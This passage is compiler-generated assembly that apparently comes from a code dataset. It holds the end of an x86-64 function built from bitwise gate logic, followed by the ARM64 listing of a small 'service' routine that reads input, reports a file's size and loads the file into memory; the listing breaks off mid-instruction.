kill: def $al killed $al killed $eax movb %al, -452(%rbp) movzbl -939(%rbp), %eax movzbl -744(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1126(%rbp) movzbl -944(%rbp), %eax movzbl -180(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -972(%rbp) movzbl -944(%rbp), %eax movzbl -180(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -849(%rbp) movzbl -562(%rbp), %eax movzbl -180(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -968(%rbp) movzbl -205(%rbp), %eax movzbl -391(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -394(%rbp) movzbl -205(%rbp), %eax movzbl -391(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -319(%rbp) movzbl -33(%rbp), %eax movzbl -391(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1119(%rbp) movzbl -1121(%rbp), %eax movzbl -711(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -329(%rbp) movzbl -1121(%rbp), %eax movzbl -711(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -683(%rbp) movzbl -746(%rbp), %eax movzbl -711(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -685(%rbp) movzbl -491(%rbp), %eax movzbl -935(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -836(%rbp) movzbl -491(%rbp), %eax movzbl -935(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -587(%rbp) movzbl -492(%rbp), %eax movzbl -935(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -585(%rbp) movzbl -917(%rbp), %eax movzbl -909(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -283(%rbp) movzbl -917(%rbp), %eax movzbl -909(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -375(%rbp) movzbl -916(%rbp), %eax movzbl -909(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1029(%rbp) movzbl -861(%rbp), %eax movzbl -267(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -266(%rbp) movzbl -861(%rbp), %eax movzbl -267(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1132(%rbp) movzbl -133(%rbp), %eax movzbl -267(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1134(%rbp) movzbl -239(%rbp), %eax movzbl -187(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1136(%rbp) movzbl -239(%rbp), %eax movzbl -187(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -175(%rbp) movzbl -238(%rbp), %eax movzbl -187(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -663(%rbp) movzbl -416(%rbp), %eax movzbl -219(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -774(%rbp) movzbl -416(%rbp), %eax movzbl -219(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -176(%rbp) movzbl -934(%rbp), %eax movzbl -219(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1130(%rbp) movzbl -548(%rbp), %eax movzbl -538(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -539(%rbp) movzbl -548(%rbp), %eax movzbl -538(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -132(%rbp) movzbl -34(%rbp), %eax movzbl -538(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -135(%rbp) movzbl -518(%rbp), %eax movzbl -53(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -967(%rbp) movzbl -916(%rbp), %eax movzbl -283(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1033(%rbp) movzbl -779(%rbp), %eax movzbl -178(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -259(%rbp) movzbl -185(%rbp), %eax movzbl -948(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -947(%rbp) movzbl -735(%rbp), %eax movzbl -734(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -733(%rbp) movzbl -939(%rbp), %eax movzbl -485(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -729(%rbp) movzbl -496(%rbp), %eax movzbl -452(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -592(%rbp) movzbl -562(%rbp), %eax movzbl -972(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -138(%rbp) movzbl -1099(%rbp), %eax movzbl -849(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -432(%rbp) movzbl -33(%rbp), %eax movzbl -394(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -471(%rbp) movzbl -73(%rbp), %eax movzbl -319(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -638(%rbp) movzbl -746(%rbp), %eax movzbl -329(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -688(%rbp) movzbl -824(%rbp), %eax movzbl -683(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -684(%rbp) movzbl -492(%rbp), %eax movzbl -836(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -260(%rbp) movzbl -588(%rbp), %eax movzbl -587(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -45(%rbp) movzbl -263(%rbp), %eax movzbl -375(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -261(%rbp) movzbl -133(%rbp), %eax movzbl -266(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -265(%rbp) movzbl -1133(%rbp), %eax movzbl -1132(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -627(%rbp) movzbl -238(%rbp), %eax movzbl -1136(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1135(%rbp) movzbl -803(%rbp), %eax movzbl -175(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -228(%rbp) movzbl -934(%rbp), %eax movzbl -774(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -771(%rbp) movzbl -177(%rbp), %eax movzbl -176(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -170(%rbp) movzbl -34(%rbp), %eax movzbl -539(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -540(%rbp) movzbl -46(%rbp), %eax movzbl -132(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -960(%rbp) movzbl -519(%rbp), %eax movzbl -967(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1083(%rbp) movzbl -870(%rbp), %eax xorl $-1, %eax movzbl -259(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1129(%rbp) movzbl -508(%rbp), %eax xorl $-1, %eax movzbl -733(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -777(%rbp) movzbl -1126(%rbp), %eax xorl $-1, %eax movzbl -592(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -933(%rbp) movzbl -968(%rbp), %eax xorl $-1, %eax movzbl -432(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1106(%rbp) movzbl -1119(%rbp), %eax xorl $-1, %eax movzbl -638(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -662(%rbp) movzbl -685(%rbp), %eax xorl $-1, %eax movzbl -684(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -681(%rbp) movzbl -585(%rbp), %eax xorl $-1, %eax movzbl -45(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -747(%rbp) movzbl -1029(%rbp), %eax xorl $-1, %eax movzbl -261(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -626(%rbp) movzbl -1134(%rbp), %eax xorl $-1, %eax movzbl -627(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -985(%rbp) movzbl -663(%rbp), %eax xorl $-1, %eax movzbl -228(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -737(%rbp) movzbl -1130(%rbp), %eax xorl $-1, %eax movzbl -170(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -181(%rbp) movzbl -135(%rbp), %eax xorl $-1, %eax movzbl -960(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -125(%rbp) movzbl -265(%rbp), %eax movzbl -626(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -649(%rbp) movzbl -1083(%rbp), %eax movzbl -125(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -386(%rbp) movzbl -947(%rbp), %eax movzbl -1129(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -450(%rbp) movzbl -729(%rbp), %eax movzbl -777(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -921(%rbp) movzbl -138(%rbp), %eax movzbl -933(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -753(%rbp) movzbl -471(%rbp), %eax movzbl -1106(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -323(%rbp) movzbl -688(%rbp), %eax movzbl -662(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -679(%rbp) movzbl -260(%rbp), %eax movzbl -681(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -752(%rbp) movzbl -586(%rbp), %eax movzbl -747(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -941(%rbp) movzbl -265(%rbp), %eax movzbl -626(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1128(%rbp) movzbl -1135(%rbp), %eax movzbl -985(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -965(%rbp) movzbl -1135(%rbp), %eax movzbl -985(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1035(%rbp) movzbl -771(%rbp), %eax movzbl -737(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -141(%rbp) movzbl -540(%rbp), %eax movzbl -181(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1172(%rbp) movzbl -965(%rbp), %eax movzbl -1128(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1026(%rbp) movzbl -214(%rbp), %eax movzbl -941(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -591(%rbp) movzbl -1135(%rbp), %eax xorl $-1, %eax movzbl -1128(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -938(%rbp) movzbl -985(%rbp), %eax xorl $-1, %eax movzbl -1128(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -86(%rbp) movzbl -1035(%rbp), %eax movzbl -938(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -867(%rbp) movzbl -86(%rbp), %eax xorl $-1, %eax movzbl -867(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -532(%rbp) movzbl -737(%rbp), %eax movzbl -532(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -531(%rbp) movzbl -737(%rbp), %eax movzbl -532(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -174(%rbp) movzbl -771(%rbp), %eax movzbl -532(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -168(%rbp) movzbl -771(%rbp), %eax movzbl -531(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -754(%rbp) movzbl -141(%rbp), %eax movzbl -174(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -173(%rbp) movzbl -168(%rbp), %eax xorl $-1, %eax movzbl -173(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -172(%rbp) movzbl -181(%rbp), %eax movzbl -172(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -171(%rbp) movzbl -181(%rbp), %eax movzbl -172(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -98(%rbp) movzbl -540(%rbp), %eax movzbl -172(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -925(%rbp) movzbl -540(%rbp), %eax movzbl -171(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -498(%rbp) movzbl -1172(%rbp), %eax movzbl -98(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -101(%rbp) movzbl -925(%rbp), %eax xorl $-1, %eax movzbl -101(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -49(%rbp) movzbl -125(%rbp), %eax movzbl -49(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -388(%rbp) movzbl -1083(%rbp), %eax movzbl -49(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1032(%rbp) movzbl -125(%rbp), %eax movzbl -49(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -872(%rbp) movzbl -1083(%rbp), %eax movzbl -872(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -563(%rbp) movzbl -386(%rbp), %eax movzbl -388(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -366(%rbp) movzbl -1032(%rbp), %eax xorl $-1, %eax movzbl -366(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -605(%rbp) movzbl -1129(%rbp), %eax movzbl -605(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -837(%rbp) movzbl -1129(%rbp), %eax movzbl -605(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -50(%rbp) movzbl -947(%rbp), %eax movzbl -605(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -192(%rbp) movzbl -947(%rbp), %eax movzbl -837(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1175(%rbp) movzbl -450(%rbp), %eax movzbl -50(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -869(%rbp) movzbl -192(%rbp), %eax xorl $-1, %eax movzbl -869(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -431(%rbp) movzbl -777(%rbp), %eax movzbl -431(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -255(%rbp) movzbl -777(%rbp), %eax movzbl -431(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -387(%rbp) movzbl -729(%rbp), %eax movzbl -431(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -555(%rbp) movzbl -729(%rbp), %eax movzbl -255(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -399(%rbp) movzbl -921(%rbp), %eax movzbl -387(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -54(%rbp) movzbl -555(%rbp), %eax xorl $-1, %eax movzbl -54(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1207(%rbp) movzbl -933(%rbp), %eax movzbl -1207(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1120(%rbp) movzbl -933(%rbp), %eax movzbl -1207(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -433(%rbp) movzbl -138(%rbp), %eax movzbl -1207(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1103(%rbp) movzbl -138(%rbp), %eax movzbl -1120(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -43(%rbp) movzbl -753(%rbp), %eax movzbl -433(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1030(%rbp) movzbl -1103(%rbp), %eax xorl $-1, %eax movzbl -1030(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -801(%rbp) movzbl -1106(%rbp), %eax movzbl -801(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -797(%rbp) movzbl -1106(%rbp), %eax movzbl -801(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -322(%rbp) movzbl -471(%rbp), %eax movzbl -801(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -324(%rbp) movzbl -471(%rbp), %eax movzbl -797(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -127(%rbp) movzbl -323(%rbp), %eax movzbl -322(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -71(%rbp) movzbl -324(%rbp), %eax xorl $-1, %eax movzbl -71(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -85(%rbp) movzbl -662(%rbp), %eax movzbl -85(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -544(%rbp) movzbl -662(%rbp), %eax movzbl -85(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -227(%rbp) movzbl -688(%rbp), %eax movzbl -85(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -682(%rbp) movzbl -688(%rbp), %eax movzbl -544(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -229(%rbp) movzbl -679(%rbp), %eax movzbl -227(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1023(%rbp) movzbl -682(%rbp), %eax xorl $-1, %eax movzbl -1023(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1022(%rbp) movzbl -681(%rbp), %eax movzbl -1022(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -833(%rbp) movzbl -681(%rbp), %eax movzbl -1022(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -124(%rbp) movzbl -260(%rbp), %eax movzbl -1022(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -749(%rbp) movzbl -260(%rbp), %eax movzbl -833(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -530(%rbp) movzbl -752(%rbp), %eax movzbl -124(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -757(%rbp) movzbl -749(%rbp), %eax xorl $-1, %eax movzbl -757(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -126(%rbp) movzbl -747(%rbp), %eax movzbl -126(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -760(%rbp) movzbl -747(%rbp), %eax movzbl -126(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -906(%rbp) movzbl -586(%rbp), %eax movzbl -126(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -213(%rbp) movzbl -586(%rbp), %eax movzbl -760(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -136(%rbp) movzbl -591(%rbp), %eax movzbl -906(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -582(%rbp) movzbl -213(%rbp), %eax xorl $-1, %eax movzbl -582(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -606(%rbp) movzbl -1038(%rbp), %eax shll $0, %eax movzbl -211(%rbp), %ecx shll $1, %ecx orl %ecx, %eax movzbl -351(%rbp), %ecx shll $2, %ecx orl %ecx, %eax movzbl -784(%rbp), %ecx shll $3, %ecx orl %ecx, %eax movzbl -52(%rbp), %ecx shll $4, %ecx orl %ecx, %eax movzbl -342(%rbp), %ecx shll $5, %ecx orl %ecx, %eax movzbl -454(%rbp), %ecx shll $6, %ecx orl %ecx, %eax movzbl -922(%rbp), %ecx shll $7, %ecx orl %ecx, %eax movzbl -202(%rbp), %ecx shll $8, %ecx orl %ecx, %eax movzbl -486(%rbp), %ecx shll $9, %ecx orl %ecx, %eax movzbl -1086(%rbp), %ecx shll $10, %ecx orl %ecx, %eax movzbl -1163(%rbp), %ecx shll $11, %ecx orl %ecx, %eax movzbl -596(%rbp), %ecx shll $12, %ecx orl %ecx, %eax movzbl -273(%rbp), %ecx shll $13, %ecx orl %ecx, %eax movzbl -44(%rbp), %ecx shll $14, %ecx orl %ecx, %eax movzbl -225(%rbp), %ecx shll $15, %ecx orl %ecx, %eax movzbl -384(%rbp), %ecx shll $16, %ecx orl %ecx, %eax movzbl -254(%rbp), %ecx shll $17, %ecx orl %ecx, %eax movzbl -1033(%rbp), %ecx shll $18, %ecx orl %ecx, %eax movzbl -649(%rbp), %ecx shll $19, %ecx orl %ecx, %eax movzbl -1026(%rbp), %ecx shll $20, %ecx orl %ecx, %eax movzbl -754(%rbp), %ecx shll $21, %ecx orl %ecx, %eax movzbl -498(%rbp), %ecx shll $22, %ecx orl %ecx, %eax movzbl -563(%rbp), %ecx shll $23, %ecx orl %ecx, %eax movzbl -1175(%rbp), %ecx shll $24, %ecx orl %ecx, %eax movzbl -399(%rbp), %ecx shll $25, %ecx orl %ecx, %eax movzbl -43(%rbp), %ecx shll $26, %ecx orl %ecx, %eax movzbl -127(%rbp), %ecx shll $27, %ecx orl %ecx, %eax movzbl -229(%rbp), %ecx shll $28, %ecx orl %ecx, %eax movzbl -530(%rbp), %ecx shll $29, %ecx orl %ecx, %eax movzbl -136(%rbp), %ecx shll $30, %ecx orl %ecx, %eax movzbl -606(%rbp), %ecx shll $31, %ecx orl %ecx, %eax movl %eax, -8(%rbp) movl -8(%rbp), %eax addq $1112, %rsp ## imm = 0x458 popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/220455042.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _service ; -- Begin function service .p2align 2 _service: ; @service .cfi_startproc ; %bb.0: sub sp, sp, #176 .cfi_def_cfa_offset 176 stp x29, x30, [sp, #160] ; 16-byte Folded Spill add x29, sp, #160 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] str x8, [sp, #40] ; 8-byte Folded Spill adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] str x8, [sp, #48] ; 8-byte Folded Spill adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur x0, [x29, #-48] ldur x8, [x29, #-48] ldr w8, [x8] stur w8, [x29, #-52] ldur w0, [x29, #-52] sub x1, x29, #28 mov x2, #20 bl _read stur x0, [x29, #-64] stur wzr, [x29, #-56] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-56] subs w8, w8, #20 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldursw x9, [x29, #-56] sub x8, x29, #28 ldrsb w10, [x8, x9] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-56] add w8, w8, #1 stur w8, [x29, #-56] b LBB0_1 LBB0_4: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fopen str x0, [sp, #80] ldr x0, [sp, #80] mov x1, #0 mov w2, #2 bl _fseek ldr x0, [sp, #80] bl _ftell sub x8, x29, #68 str x8, [sp, #24] ; 8-byte Folded Spill mov x8, x0 stur w8, [x29, #-68] ldr x0, [sp, #80] bl _rewind ldr x8, [sp, #24] ; 8-byte Folded Reload str x8, [sp, #72] mov x9, sp mov x8, #8 str x8, [sp, #32] ; 8-byte Folded Spill str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x2, [sp, #32] ; 8-byte Folded Reload ldur w0, [x29, #-52] ldr x1, [sp, #72] bl _write ldursw x9, [x29, #-68] mov x8, #1 mul x0, x8, x9 bl _malloc str x0, [sp, #56] ldr x8, [sp, #56] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x1, [x8] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _fputs mov w0, #2 bl _exit LBB0_6: ldr x0, [sp, #56] ldursw x2, [x29, #-68] ldr x3, [sp, #80] mov x1, #1 bl _fread ldur w9, [x29, #-68] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, 